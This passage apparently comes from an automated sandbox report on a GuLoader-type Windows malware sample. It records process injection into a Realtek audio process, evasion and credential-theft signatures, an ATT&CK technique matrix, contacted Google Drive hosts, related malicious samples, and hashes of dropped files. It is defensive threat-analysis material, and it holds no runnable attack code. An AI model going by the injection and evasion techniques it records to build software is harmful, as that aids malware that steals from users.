      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C20 mov eax, dword ptr fs:[00000030h]3_2_35FA3C20
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov ecx, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89FD0 mov eax, dword ptr fs:[00000030h]3_2_35F89FD0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8BFC0 mov eax, dword ptr fs:[00000030h]3_2_35F8BFC0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36027C38 mov eax, dword ptr fs:[00000030h]3_2_36027C38
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36055C38 mov eax, dword ptr fs:[00000030h]3_2_36055C38
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36055C38 mov ecx, dword ptr fs:[00000030h]3_2_36055C38
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91FAA mov eax, dword ptr fs:[00000030h]3_2_35F91FAA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36013C57 mov eax, dword ptr fs:[00000030h]3_2_36013C57
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBBF93 mov eax, dword ptr fs:[00000030h]3_2_35FBBF93
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36013C80 mov ecx, dword ptr fs:[00000030h]3_2_36013C80
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8BF70 mov eax, dword ptr fs:[00000030h]3_2_35F8BF70
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91F70 mov eax, dword ptr fs:[00000030h]3_2_35F91F70
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604FC95 mov eax, dword ptr fs:[00000030h]3_2_3604FC95
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C98 mov ecx, dword ptr fs:[00000030h]3_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C98 mov eax, dword ptr fs:[00000030h]3_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C98 mov eax, dword ptr fs:[00000030h]3_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C98 mov eax, dword ptr fs:[00000030h]3_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8FF30 mov edi, dword ptr fs:[00000030h]3_2_35F8FF30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADF36 mov eax, dword ptr fs:[00000030h]3_2_35FADF36
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADF36 mov eax, dword ptr fs:[00000030h]3_2_35FADF36
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADF36 mov eax, dword ptr fs:[00000030h]3_2_35FADF36
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADF36 mov eax, dword ptr fs:[00000030h]3_2_35FADF36
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36015CD0 mov eax, dword ptr fs:[00000030h]3_2_36015CD0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov eax, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov eax, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov ecx, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov eax, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov eax, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36027CE8 mov eax, dword ptr fs:[00000030h]3_2_36027CE8

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtSetContextThread: Indirect: 0x35C93650
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtResumeThread: Indirect: 0x35CF3C70
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtQueueApcThread: Indirect: 0x5C8F482
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x7FF9EC163A8F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtSuspendThread: Indirect: 0x35CF3960
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtQueueApcThread: Indirect: 0x35CEF482
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtSetContextThread: Indirect: 0x35CF3650
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtResumeThread: Indirect: 0x5C93C70
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtSuspendThread: Indirect: 0x35C93960
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtQueueApcThread: Indirect: 0x35C8F482
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtSuspendThread: Indirect: 0x5C93960
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtSetContextThread: Indirect: 0x5C93650
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | NtResumeThread: Indirect: 0x35C93C70
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x7FFA20B42651
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x7FF9EC1F9E7F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Thread register set: target process: 4376
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Process created: C:\Users\user\Desktop\LkzvfB4VFj.exe "C:\Users\user\Desktop\LkzvfB4VFj.exe"
      Source: RAVCpl64.exe, 00000004.00000000.93058361809.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.96712076690.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
      Source: RAVCpl64.exe, 00000004.00000000.93058361809.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.96712076690.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
      Source: RAVCpl64.exe, 00000004.00000000.93058361809.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.96712076690.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
      Source: RAVCpl64.exe, 00000004.00000000.93058361809.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.96712076690.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

      Stealing of Sensitive Information

      Source: Yara match, File source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match, File source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      MITRE ATT&CK matrix (numbers before a technique name are the signature counts reported for that technique):

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 312 Process Injection | 1 Access Token Manipulation | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 312 Process Injection | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | NTDS | 13 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

      Source | Detection | Scanner | Label
      LkzvfB4VFj.exe | 55% | ReversingLabs | Win32.Trojan.Guloader
      LkzvfB4VFj.exe | 100% | Avira | TR/Injector.kowvu

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dll | 0% | ReversingLabs |

      No Antivirus matches
      No Antivirus matches

      Source | Detection | Scanner | Label
      http://nsis.sf.net/NSIS_ErrorError | 0% | Avira URL Cloud | safe
      http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe
      https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe
      http://nsis.sf.net/NSIS_Error | 0% | Avira URL Cloud | safe
      http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.72.110 | true | false | | high
      drive.usercontent.google.com | 142.250.65.225 | true | false | | high
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://www.google.com | LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | LkzvfB4VFj.exe, 00000003.00000001.92670024894.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high
      http://nsis.sf.net/NSIS_Error | LkzvfB4VFj.exe | false | Avira URL Cloud: safe | unknown
      https://drive.google.com/ | LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | LkzvfB4VFj.exe, 00000003.00000001.92670024894.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high
      https://drive.google.com/. | LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.quovadis.bm0 | LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://drive.usercontent.google.com/ | LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://apis.google.com | LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://nsis.sf.net/NSIS_ErrorError | LkzvfB4VFj.exe | false | Avira URL Cloud: safe | unknown
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000626000.00000020.00000001.01000000.00000006.sdmp | false | | high
      https://ocsp.quovadisoffshore.com0 | LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.gopher.ftp://ftp. | LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
      https://drive.usercontent.google.com/T | LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | false | | high
      IP | Domain | Country | ASN | ASN Name | Malicious
      142.250.72.110 | drive.google.com | United States | 15169 | GOOGLEUS | false
      142.250.65.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1552178
                              Start date and time:2024-11-08 14:19:32 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 15m 14s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:4
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:LkzvfB4VFj.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@3/8@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 89%
                              • Number of executed functions: 54
                              • Number of non-executed functions: 295
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: LkzvfB4VFj.exe
                              No simulations
                              No context
                              No context
                              No context
      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      37f463bf4616ecd445d4a1937da06e19 | gjbrNWQeg1.exe | malicious | GuLoader | 142.250.65.225, 142.250.72.110
      | kJyOzzBNim.exe | malicious | GuLoader | 142.250.65.225, 142.250.72.110
      | 7DqFctwwsk.exe | malicious | GuLoader, Snake Keylogger | 142.250.65.225, 142.250.72.110
      | 6cUI1ZCp5E.exe | malicious | GuLoader | 142.250.65.225, 142.250.72.110
      | FcRCSylOMs.exe | malicious | FormBook, GuLoader | 142.250.65.225, 142.250.72.110
      | kChWJJNUHz.exe | malicious | GuLoader, Snake Keylogger | 142.250.65.225, 142.250.72.110
      | Y725GT96z1.exe | malicious | FormBook, GuLoader | 142.250.65.225, 142.250.72.110
      | RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe | malicious | GuLoader, Remcos | 142.250.65.225, 142.250.72.110
      | z3356_DNF_E2I36P5K_26.msi | malicious | Unknown | 142.250.65.225, 142.250.72.110
      | 4YgQ2xN41W.lnk | malicious | RDPWrap Tool, Ducktail | 142.250.65.225, 142.250.72.110

      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dll | z120X20SO__UK__EKMELAMA.exe | malicious | GuLoader, Remcos |
      | Quotation-GINC-19-00204.exe | malicious | GuLoader, Snake Keylogger |
      | Produkttyper.exe | malicious | FormBook, GuLoader |
      | Impressionist.exe | malicious | GuLoader |
      | PAGO.exe | malicious | GuLoader |
      | PAGO.exe | malicious | FormBook, GuLoader |
      | Obstetricated.exe | malicious | FormBook, GuLoader |
      | Orden de compra.exe | malicious | GuLoader |
      | Orden de compra.exe | malicious | FormBook, GuLoader |
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):5.854450882766351
                                                Encrypted:false
                                                SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                 • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious
                                                 • Filename: Quotation-GINC-19-00204.exe, Detection: malicious
                                                 • Filename: Produkttyper.exe, Detection: malicious
                                                 • Filename: Impressionist.exe, Detection: malicious
                                                 • Filename: PAGO.exe, Detection: malicious
                                                 • Filename: PAGO.exe, Detection: malicious
                                                 • Filename: Obstetricated.exe, Detection: malicious
                                                 • Filename: Orden de compra.exe, Detection: malicious
                                                 • Filename: Orden de compra.exe, Detection: malicious
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):457024
                                                Entropy (8bit):2.657648980780291
                                                Encrypted:false
                                                SSDEEP:1536:q9QYlyFgTDQ27YRJknuJpCrouPJezz3WvLuzBHeCswIX2diBo4z02gt/p3UEP5sa:aBJUcbZzqN7zh+syt1esyn24MGptl
                                                MD5:3E65AB856E3180279BBD28D11CBBB8B2
                                                SHA1:36BF6F2278D3EDF764C5D6F06FEE67251EF34C36
                                                SHA-256:4B8EB25D2A1328E2FDEE9A1F7654F02DD18401643C82C36BA56C92ECAA769BCD
                                                SHA-512:CB9ABA7BA1BD722FA82E2E7BF8A7BE6AE7D8DD56B599390AB26B14D7A27367284D8A4646A2634D671A5E65F422FB46DF473C065A532FB260DB473D69A2C1DF7C
                                                Malicious:false
                                                Reputation:low
                                                Preview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
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):214005
                                                Entropy (8bit):7.5415932130722165
                                                Encrypted:false
                                                SSDEEP:6144:rphX8N6JOmQClcEjFK/FPpQP3JwCmzBXWdkD9:rq64DgRjo/3c3JwtBXEu
                                                MD5:2137D24C988EC559DA788C41A4F5235C
                                                SHA1:59BDC7C8B86ADCC1EBB44C9E71954EAB87BA8C3D
                                                SHA-256:74779ACCBD7DD2E132B02DA893F6BFC1D54E7AB601F209CD6DD831E5B614D055
                                                SHA-512:D212C5F7ECA211EC963A29448AFEE01D98A0E4428D082E4E4D6E96344F24849398F243E0180DCC37B79F5415BBC4F56D170891AC58059B69EE6105F7A60C9E91
                                                Malicious:false
                                                Reputation:low
                                                Preview:..EE.~..........e.:......[.T............''''...FF..................MM.....................::..FF...........s.hh.666......v.22........PPPP..2.........wwww.....!!.U.........@@................%%%.............}}}}}........i......EE........NN.......?????...O.,...../...........................8..%......k......Z.99........9........||||............UU...kkk.44.....y..............K......?............................................;..11.........[...@@.x.%...Q...........FFF............S........3..................OO.....................................n.................}}.........$...tttt........ccc...~~~..r.4...................ppppp............EE........``.R...............N........................7.........WW.........D.....4........rrr.........................dddd.....................Q............B......--.VV.........t...vv.............F.\\..$...........!..........uuu.....T.........77.......>>.....-.......Q...................x.88888....................[[.................................!!........
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):442363
                                                Entropy (8bit):1.2533707838755617
                                                Encrypted:false
                                                SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                MD5:5465B75724C031B21C018F7D72941F72
                                                SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):521
                                                Entropy (8bit):4.284169749449499
                                                Encrypted:false
                                                SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                Malicious:false
                                                Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):485127
                                                Entropy (8bit):1.2565961974341746
                                                Encrypted:false
                                                SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                MD5:580D05E679E74B036B55CA8E5FF32769
                                                SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                Malicious:false
                                                Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):389868
                                                Entropy (8bit):1.2469892412772452
                                                Encrypted:false
                                                SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                Malicious:false
                                                Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................
                                                Process:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):734
                                                Entropy (8bit):3.2819121006350698
                                                Encrypted:false
                                                SSDEEP:12:8wl01sXUCTGlnEEqEu3w/g/rNJkKAh4t2YCBTo8:82svqo/45HALJT
                                                MD5:77093B00B23F98CBA6C0D1C948350193
